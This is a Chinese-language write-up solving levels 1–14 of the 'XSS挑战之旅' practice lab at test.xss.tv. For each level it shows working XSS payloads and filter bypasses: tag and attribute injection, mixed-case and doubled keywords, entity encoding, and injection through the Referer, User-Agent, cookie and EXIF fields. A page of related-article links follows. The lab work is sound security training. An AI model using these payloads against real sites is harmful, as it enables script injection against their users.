XSS挑战之旅 解题记录
本文记录xss挑战解题,检验自己的xss技术
题目链接
Level1
链接为http://test.xss.tv/level1.php?name=test
页面没有输入点
直接构造payloadname=<script>alert(1)</script>
Level2
一样简单,给出payload"><script>alert(1)</script>
Level3
过滤了尖括号
故用`’ οnclick=alert(1)//
Level4
和L3一样,不同的是这里用双引号闭合
" onclick=alert(1)//
Level5
用上面的进行尝试,发现将onclick变成o_nclick
这里改用添加链接方式
"><a href="javascript:alert(1)">
然后点击链接即可
Level6
这里也将href过滤成hr_ef
这里用大小写绕过过滤
"><a hrEf="javascript:alert(1)">
Level7
这里直接将href script删除
于是采用机智方法
"><a hrhrefef="javascrscriptipt:alert(1)">
Level8
这里可以添加链接到页面
于是直接javascript:alert(1)
但是不行因为会将script过滤成scr_ipt
这里采用HTML字符实体转换
将script转化成script
最后payload javascript:alert(1)
Level9
使用上关的payload,被提示不合法,说明对链接进行了格式要求
这里尝试了很多次,最后看到网上的解答,吐血
因为这里只需要有http://即可
javascript:alert("http://")
值得一提的是双引号会被过滤,于是第一个双引号用实体转换机即可
Level10
看源码,发现有几个type=hidden的输入框
于是使其显示并可以onclick触发事件
http://test.xss.tv/level10.php?t_sort=4" onclick=alert(1) type="text"
Level11
看源码,有个是显示referer
<input name="t_ref" value="http://test.xss.tv/level10.php?t_sort=4%22%20onclick=alert(1)%20type=%22text%22" type="hidden">
这里也是尝试很多次,但是始终无法使得输入框改变type
最后百度得出要抓包改referer即可
修改referer=12356" onclick=alert(1) type=text
Level12
和上一关类似,这次修改user-agent
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" onclick=alert(1) type="text"
Level13
看网页源码有个输入框叫cook,故去看看cookie
果然有个cookie值为call me maybe
修改cookiecall me maybe?" onclick=alert(1) type="text"
Level14
这里也是没思绪
百度得出答案,这里用的是乌云爆出的exif viewer的漏洞
修改图片exif信息如标题、作者' "><img src=1 onerror=alert(document.domain)>
即可
之后第15关的链接失效了,就没做下去了
XSS挑战之旅 解题记录相关推荐
- XSS平台 XSS挑战之旅 解题记录 writeup
XSS平台 XSS挑战之旅 解题记录 writeup level1 level2 level3 level4 level5 level6 level7 level8 level9 level10 le ...
- test.ctf8(XSS挑战之旅)解题记录
xss平台网址:test.ctf8.com 过关条件:只有能够跳出完成得不错得提示框,即为过关 level1 第一关没啥好说得,入门题 payload <script>alert('abc ...
- XSS挑战之旅---游戏通关攻略
最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...
- 从xss挑战之旅来重读xss(一)
在开始这篇文章之前,先简单聊几句: xss很多时候是鸡肋,比如说self-xss 很多厂商都会注明拒收反射xss,如58src 遇到请证明危害性的说法就走,人家的潜台词也是拒收反射xss 遇到收反射x ...
- xss挑战之旅11-19关
文章目录 前言 第11关:referer 第12关:User-Agent 第13关:cookie 第14关:exif xss 第15关:ng-include 第16关 第17关 第18关 第19关:f ...
- XSS学习-XSS挑战之旅(二)
前言:之前打XSS平台时,打到了第11关就没有继续了,现在有空了就继续打咯,再增加点关于XSS的知识. 第十一关 这关坑我好长时间,看了好多博客直接给说修改Referer,给截图中都有自带的Refer ...
- Docker下搭建XSS挑战之旅靶场
我是在centos7下使用docker搭建xss挑战之旅靶场 一.先安装下docker容器 1.安装需要的软件包, yum-util 提供yum-config-manager功能,另两个是device ...
- ubuntu使用docker搭建xss挑战之旅环境
ubuntu使用docker搭建xss挑战之旅环境 (1)启动docker docker systemctl start docker (2)下载docker-compose部署容器 git clon ...
- 使用docker搭建sqli-lab环境以及upload-labs环境 xss挑战之旅环境 搭建vulhub环境
sqli-lab环境 1)查找sqli-lab环境 docker search sqli-labs 2)拉取镜像 docker pull acgpiano/sqli-labs 3) docker ru ...
最新文章
- php中magic_quotes_gpc对unserialize的影响
- 余弦距离(Cosine距离)与编辑距离分别是什么?各有什么优势和使用场景?
- 九度OJ 区间问题 10000个随机正负数生成
- java coding_java coding学习
- 某业务付费统计脚本问题排查
- 在ubuntu16下安装virtualenv+virtualenvwrapper
- ant 安装及基础教程 !
- win10树莓派改ip_Window 10通过网线和Wifi连接树莓派
- 【剑指offer】_02替换空格
- 用户使用说明c语言,(C语言使用指南.docx
- linux下c语言读取roed文件,如何在Linux系统上安装Android4.4.docx
- Mysql Federated For Windows
- 最实用的正则表达式整理
- android listview优化,Android ListView 详解及其优化
- PS 做动态图视频教程
- python 大数据入门教程
- 按键精灵的5级开发认证,笔试题参考
- [bzoj2827]千山鸟飞绝【splay】
- IOS 学习笔记14 内存管理(3)有效的内存管理 后半部分
- 移动硬盘坏了数据可以恢复吗?新方法一看便知